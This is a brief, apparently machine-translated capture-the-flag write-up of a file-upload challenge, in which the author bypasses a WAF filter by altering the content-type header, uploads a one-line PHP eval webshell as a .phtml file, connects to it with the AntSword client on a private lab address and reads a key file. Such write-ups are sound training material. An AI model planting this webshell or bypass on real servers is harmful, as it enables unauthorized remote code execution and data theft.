File upload question type

subject ： Through what you have learned , Test its passing WAF Filter rule , Break through uploading to get webshell, The answer is in the root directory key.php In file .

Upload first 1.php file , Inside the preparation of a sentence Trojan horse :<?php eval($_POST[c]);?>

1、 Get content by grabbing packets , It is found that the upload failed

2、 Bypass uploading by suffix ： Failure

3、 Bypass by content header ： success （ It may also be shielded eval function , Use system Function or assert() function ）

Go to the upload path ：http://192.168.129.128:82/vulnerabilities/1.phtml

Use the ant sword webshell Connect ：http://192.168.129.128:82/vulnerabilities/1.phtml

Get into webshell Background management interface ：

Get key.php value ;

Another way ：

1、 Upload system() Function to view the file in the current path

2、 View the files in the upper level directory , Find out key.php file

3、 Open the upper level directory key.php file , find key value